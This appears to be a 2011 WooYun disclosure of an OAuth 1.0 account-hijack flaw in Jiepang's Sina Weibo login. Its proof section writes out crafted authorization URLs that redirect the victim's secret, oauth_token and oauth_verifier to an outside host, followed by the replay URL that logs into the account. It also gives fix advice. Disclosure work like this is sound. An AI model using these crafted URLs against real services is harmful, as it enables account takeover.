当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02010

漏洞标题:街旁网第三方登录劫持漏洞

相关厂商:街旁网

漏洞作者: rayh4c

提交时间:2011-04-29 16:55

修复时间:2011-05-04 18:00

公开时间:2011-05-04 18:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-04-29: 细节已通知厂商并且等待厂商处理中
2011-05-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

街旁网使用了新浪微博的Oauth授权作为自己的第三方账户登录接口,由于Oauth1.0协议存在安全漏洞,导致通过新浪微博登录街旁网的账户能被任意劫持控制。

详细说明:

Oauth1.0协议存在安全漏洞,oauth_callback参数能重定向到任意网站,通过该漏洞黑客可以构造恶意的授权URL,从而获取用户关键的secret,oauth_token,oauth_verifier关键参数。
街旁使用的新浪微博的Oauth授权方式的登录接口存在此类型的漏洞,黑客可以任意劫持控制以此方式登录的街旁账户。

漏洞证明:

1.准备一个已授权街旁登录的新浪微博账户。
2.登录新浪微博后,受害者访问了恶意的授权URL,如重定向到163.com
http://api.t.sina.com.cn/oauth/authorize?oauth_token=cb6bb803f402fb589cfd4885b71a6541&oauth_callback=http%3A%2F%2F163.com%2Fsignup%2Fsina%3Fsecret=4296ae3151651e83b2117b09f798ae98&display=page
3.返回的第三方验证URL重定向到163.com
http://www.163.com/?secret=4296ae3151651e83b2117b09f798ae98&oauth_token=cb6bb803f402fb589cfd4885b71a6541&oauth_verifier=446660
4.那么163服务器将可以盗取secret,oauth_token,oauth_verifier关键参数,通过街旁的登录接口登录受害者的账户。
http://jiepang.com/signup/sina?secret=4296ae3151651e83b2117b09f798ae98&oauth_token=cb6bb803f402fb589cfd4885b71a6541&oauth_verifier=446660
整个过程只需要受害者在新浪微博上点击一个恶意的授权URL即可。

修复方案:

建议和新浪相关方协商
1.将街旁的授权接口的oauth_callback参数限定为街旁固定的安全的URL。
2.控制oauth授权的时效性,不使用永久授权方式。

版权声明:转载请注明来源 rayh4c@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-05-04 18:00

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

暂无